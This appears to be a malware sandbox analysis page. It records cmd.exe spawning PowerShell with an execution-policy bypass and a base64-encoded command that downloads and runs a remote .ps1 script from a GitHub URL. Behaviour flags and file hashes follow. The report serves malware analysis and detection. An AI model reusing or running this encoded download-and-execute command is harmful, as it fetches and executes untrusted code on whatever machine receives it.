C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:4044
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:5052
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5068
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8f1a77661d61dd4da6640eef43a23b8b
SHA15f5a64847dc0b47fc04e6d2f8bde97f021f03944
SHA25652e29a6a3b4fe12c23d2c057f0228ccf720d50615a17bbcc3bba9fd11dd8bd59
SHA5122588459bdf58e4ca34e1f07b21c7d7bc642d3ffb6c408f7cfccddb0b4e0d4bcd5d4802bbb28645ab17622ad95fa3d713ba1c9970680a40002fe7968a3946097d
-
MD5
43c612824034d372a2147adde8e768d0
SHA1603eff8d1f3ea00ae0836e0a9f46c671fc312811
SHA25628624f6137cc35cfd2fd921ff4ee270f94cd027a975cc0074ef21871d3768b3d
SHA51260344a7dbcf8b1c2c5cfc2cc5d1c7ef76a8a194db7f228bb2cec0ac4311837f95ee38d6396ce9d0952fef247d8e3a173539095d72ec29992a46e424ee4193be9
-
MD5
9d21abc1a799ae0ea31258d563532295
SHA1a9cde90ba328e30a3eb7a5c410b304a4ae09cdba
SHA2568075e676d039b5791405f3ab00787a16199920dfe025ff04359b953565bf6f2f
SHA512b9324c8b4af372a89aaa8c864dab88e74fdd820b28b6fe03897151e23de01b0a0857959e0e023340e4dd18ba0a6dad2faaf365580769b3a473070457b72b3065
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
6847ea95f6502b5e247c4c9b15e7c550
SHA114560fa98b580e2bc61b540e882c4b189baa0548
SHA25696af6a8c1909ba1870812eb4b50f7b5d1932393497ee0377e9304b33e2c91ac8
SHA512c3123f104c73ef6d14a0fddd687df65b94b5b0f34b2385587ac7d52b90757d6c0c28dc4ec3a015837d52b10b58d0418877b0951d0d9f8a6b0a0459c600ab8abb
-
MD5
848d49df70c48d0288cfed3e85b84033
SHA199d4922beb8d64ec5490aab9a79143f5666b79c8
SHA256aa548d2b29250898debf642a921ad659d2f031f2dc27214da9342f2605d0a6f4
SHA512e9f71be7fd42a84857088bf8e72b7e7aa40976178ff407eab35da865b9ee80ea645a773ab77e5b8285242d7491f73b67036d6d4688d7311440df3124a0d98c4f
-
MD5
2997902dba8aefe9e872b14c2bfb584b
SHA1cca608ebdde64a12dca56b2bd4864089857eba01
SHA256537ab9c5f678410f21c063f11f4a894cc15025a5590199716a01bbf365dc0e50
SHA5124fc959cbf5bebfcb5a32fdebd2ceec8943f9d3d0ffcaed236b2d73b680c5c5f6c85d5ad3d192d7d565f4b2fe07fb87321a8036a304147df2b7f45936ff5f9fc1
-
MD5
9119f61ba0d487585a8fd5aaa4198a9a
SHA11ff2e337e5d1547d9e1824062500f743aae999db
SHA2566a3da788a78fc2024fbfb135624047a7d15edcae3798a3cb0e87fbab740d70f1
SHA512322e3e0006a3015c0495b76bdf9125285e6a6dd2f84d69996e4d95cbc73449269b7945ccccad465d417394075bc69f46f91ad1eb95f717958977cb88139267ab